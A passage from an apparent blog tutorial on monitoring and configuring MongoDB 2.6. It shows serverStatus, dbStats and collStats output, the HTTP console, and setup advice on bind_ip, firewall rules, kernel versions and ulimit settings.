ns total read write 2014-07-07T15:20:39
mp3db.mp3.chunks 0ms 0ms 0ms
local.system.replset 0ms 0ms 0ms
local.system.namespaces 0ms 0ms 0ms
local.system.indexes 0ms 0ms 0ms
local.startup_log 0ms 0ms 0ms
config.version 0ms 0ms 0ms
config.system.namespaces 0ms 0ms 0ms
^C
jason@localhost:~$

HTTP Console - MongoDB provides a web interface that exposes diagnostic and monitoring information on a simple web page. The console listens on the mongod port plus 1000, for example http://192.168.0.2:28017/
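A quick way to confirm the console is reachable from another machine:

# Fetch the diagnostics page; the console listens on 27017 + 1000.
curl http://192.168.0.2:28017/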

Now let's use db.serverStatus() from the mongo shell. The serverStatus command returns a general overview of the status of the database, detailing disk usage, memory use, connections, journaling, and index access. The command returns quickly and does not impact MongoDB performance.
> db.serverStatus()
{
"host" : "debby.e2e.serveftp.net",
"version" : "2.6.3",
"process" : "mongod",
"pid" : NumberLong(3651),
"uptime" : 1130615,
"uptimeMillis" : NumberLong(1130614302),
"uptimeEstimate" : 1115929,
"localTime" : ISODate("2014-07-07T15:27:14.416Z"),
"asserts" : {
"regular" : 0,
"warning" : 0,
"msg" : 0,
"user" : 2,
"rollovers" : 0
},
"backgroundFlushing" : {
"flushes" : 18843,
"total_ms" : 127648,
"average_ms" : 6.774292840842754,
"last_ms" : 2,
"last_finished" : ISODate("2014-07-07T15:26:43.282Z")
},
"connections" : {
"current" : 1,
"available" : 51199,
"totalCreated" : NumberLong(57)
},
"cursors" : {
"note" : "deprecated, use server status metrics",
"clientCursors_size" : 0,
"totalOpen" : 0,
"pinned" : 0,
"totalNoTimeout" : 2,
"timedOut" : 1
},
"extra_info" : {
"note" : "fields vary by platform",
"heap_usage_bytes" : 23483832,
"page_faults" : 13958
},
"globalLock" : {
"totalTime" : NumberLong("1130614310000"),
"lockTime" : NumberLong(184448),
"currentQueue" : {
"total" : 0,
"readers" : 0,
"writers" : 0
},
"activeClients" : {
"total" : 0,
"readers" : 0,
"writers" : 0
}
},
"indexCounters" : {
"accesses" : 451,
"hits" : 451,
"misses" : 0,
"resets" : 0,
"missRatio" : 0
},
"locks" : {
"." : {
"timeLockedMicros" : {
"R" : NumberLong(149),
"W" : NumberLong(184448)
},
"timeAcquiringMicros" : {
"R" : NumberLong(29),
"W" : NumberLong(32)
}
},
"admin" : {
"timeLockedMicros" : {
"r" : NumberLong(7348709),
"w" : NumberLong(0)
},
"timeAcquiringMicros" : {
"r" : NumberLong(55635),
"w" : NumberLong(0)
}
},
"local" : {
"timeLockedMicros" : {
"r" : NumberLong(59492773),
"w" : NumberLong(32)
},
"timeAcquiringMicros" : {
"r" : NumberLong(3164744),
"w" : NumberLong(3)
}
},
"config" : {
"timeLockedMicros" : {
"r" : NumberLong(182516),
"w" : NumberLong(0)
},
"timeAcquiringMicros" : {
"r" : NumberLong(46473),
"w" : NumberLong(0)
}
},
"mydb" : {
"timeLockedMicros" : {
"r" : NumberLong(43791920),
"w" : NumberLong(118)
},
"timeAcquiringMicros" : {
"r" : NumberLong(2159715),
"w" : NumberLong(9)
}
},
"test" : {
"timeLockedMicros" : {
"r" : NumberLong(28235652),
"w" : NumberLong(252)
},
"timeAcquiringMicros" : {
"r" : NumberLong(4052053),
"w" : NumberLong(19)
}
},
"mp3db" : {
"timeLockedMicros" : {
"r" : NumberLong(42491162),
"w" : NumberLong(1053565)
},
"timeAcquiringMicros" : {
"r" : NumberLong(6120501),
"w" : NumberLong(832)
}
}
},
"network" : {
"bytesIn" : 13516862,
"bytesOut" : 34014948,
"numRequests" : 733
},
"opcounters" : {
"insert" : 112,
"query" : 100247,
"update" : 0,
"delete" : 18,
"getmore" : 3,
"command" : 344
},
"opcountersRepl" : {
"insert" : 0,
"query" : 0,
"update" : 0,
"delete" : 0,
"getmore" : 0,
"command" : 0
},
"recordStats" : {
"accessesNotInMemory" : 10,
"pageFaultExceptionsThrown" : 1,
"admin" : {
"accessesNotInMemory" : 0,
"pageFaultExceptionsThrown" : 0
},
"config" : {
"accessesNotInMemory" : 0,
"pageFaultExceptionsThrown" : 0
},
"local" : {
"accessesNotInMemory" : 1,
"pageFaultExceptionsThrown" : 0
},
"mp3db" : {
"accessesNotInMemory" : 1,
"pageFaultExceptionsThrown" : 1
},
"mydb" : {
"accessesNotInMemory" : 2,
"pageFaultExceptionsThrown" : 0
},
"test" : {
"accessesNotInMemory" : 6,
"pageFaultExceptionsThrown" : 0
}
},
"writeBacksQueued" : false,
"mem" : {
"bits" : 32,
"resident" : 12,
"virtual" : 445,
"supported" : true,
"mapped" : 320
},
"metrics" : {
"cursor" : {
"timedOut" : NumberLong(1),
"open" : {
"noTimeout" : NumberLong(2),
"pinned" : NumberLong(0),
"total" : NumberLong(0)
}
},
"document" : {
"deleted" : NumberLong(72),
"inserted" : NumberLong(112),
"returned" : NumberLong(1294),
"updated" : NumberLong(0)
},
"getLastError" : {
"wtime" : {
"num" : 0,
"totalMillis" : 0
},
"wtimeouts" : NumberLong(0)
},
"operation" : {
"fastmod" : NumberLong(0),
"idhack" : NumberLong(0),
"scanAndOrder" : NumberLong(0)
},
"queryExecutor" : {
"scanned" : NumberLong(106),
"scannedObjects" : NumberLong(106)
},
"record" : {
"moves" : NumberLong(0)
},
"repl" : {
"apply" : {
"batches" : {
"num" : 0,
"totalMillis" : 0
},
"ops" : NumberLong(0)
},
"buffer" : {
"count" : NumberLong(0),
"maxSizeBytes" : 268435456,
"sizeBytes" : NumberLong(0)
},
"network" : {
"bytes" : NumberLong(0),
"getmores" : {
"num" : 0,
"totalMillis" : 0
},
"ops" : NumberLong(0),
"readersCreated" : NumberLong(0)
},
"preload" : {
"docs" : {
"num" : 0,
"totalMillis" : 0
},
"indexes" : {
"num" : 0,
"totalMillis" : 0
}
}
},
"storage" : {
"freelist" : {
"search" : {
"bucketExhausted" : NumberLong(0),
"requests" : NumberLong(97),
"scanned" : NumberLong(166)
}
}
},
"ttl" : {
"deletedDocuments" : NumberLong(0),
"passes" : NumberLong(18840)
}
},
"ok" : 1
}
>

dbStats - The dbStats command, or db.stats() from the shell, returns a document that addresses storage use and data volumes. dbStats reflects the amount of storage used, the quantity of data contained in the database, and object, collection, and index counters.
> use mp3db
switched to db mp3db
> db.stats()
{
"db" : "mp3db",
"collections" : 4,
"objects" : 14,
"avgObjSize" : 42210.28571428572,
"dataSize" : 590944,
"storageSize" : 35037184,
"numExtents" : 7,
"indexes" : 4,
"indexSize" : 32704,
"fileSize" : 67108864,
"nsSizeMB" : 16,
"dataFileVersion" : {
"major" : 4,
"minor" : 5
},
"extentFreeList" : {
"num" : 0,
"totalSize" : 0
},
"ok" : 1
}
>

collStats - The collStats command provides statistics that resemble dbStats at the collection level, including a count of the objects in the collection, the size of the collection, the amount of disk space used by the collection, and information about its indexes.
> db.mp3.chunks.stats()
{
"ns" : "mp3db.mp3.chunks",
"count" : 2,
"size" : 589792,
"avgObjSize" : 294896,
"storageSize" : 35012608,
"numExtents" : 4,
"nindexes" : 2,
"lastExtentSize" : 15290368,
"paddingFactor" : 1,
"systemFlags" : 1,
"userFlags" : 1,
"totalIndexSize" : 16352,
"indexSizes" : {
"_id_" : 8176,
"files_id_1_n_1" : 8176
},
"ok" : 1
}
>

replSetGetStatus - The replSetGetStatus command (rs.status() from the shell) returns an overview of your replica set’s status. The replSetGetStatus document details the state and configuration of the replica set and statistics about its members.
> rs.status()
{ "ok" : 0, "errmsg" : "not running with --replSet" }

The log is available at /var/log/mongodb/mongod.log.

configuration

There are too many configuration options to cover here, but below are the essential ones you might need to change.

As mentioned previously, if the application and the database run on two different servers, then on the server running the mongod instance you should comment out bind_ip:
# Listen to local interface only. Comment out to listen on all interfaces.
#bind_ip = 127.0.0.1

The default port is 27017; make sure this port and IP can be reached from the application server, and preferably only from there, as sketched below.
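A minimal iptables sketch for that, assuming the application server is 192.168.0.3 (substitute your own address, and adapt if you use firewalld or another front end):

# Allow only the app server to reach mongod, drop everyone else.
iptables -A INPUT -p tcp -s 192.168.0.3 --dport 27017 -j ACCEPT
iptables -A INPUT -p tcp --dport 27017 -j DROP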

Use kernel 2.6.36 or later.

In general, if you use the Ext4 file system, use at least version 2.6.23 of the Linux Kernel.

In general, if you use the XFS file system, use at least version 2.6.25 of the Linux Kernel.

Set the file descriptor limit, -n, and the user process limit (ulimit), -u, above 20,000, according to the suggestions in the ulimit document. A low ulimit will affect MongoDB when under heavy use and can produce errors and lead to failed connections to MongoDB processes and loss of service.
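A sketch of checking and raising those limits; the user name and exact values below are assumptions, and anything above 20,000 satisfies the suggestion:

# Check the limits of the shell that will start mongod.
ulimit -n    # open file descriptors
ulimit -u    # max user processes
# Raise them persistently in /etc/security/limits.conf, e.g. for a
# dedicated mongod user:
#   mongod  soft  nofile  64000
#   mongod  hard  nofile  64000
#   mongod  soft  nproc   32000
#   mongod  hard  nproc   32000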

That's it. Please go to the donate page and contribute back if you learned something.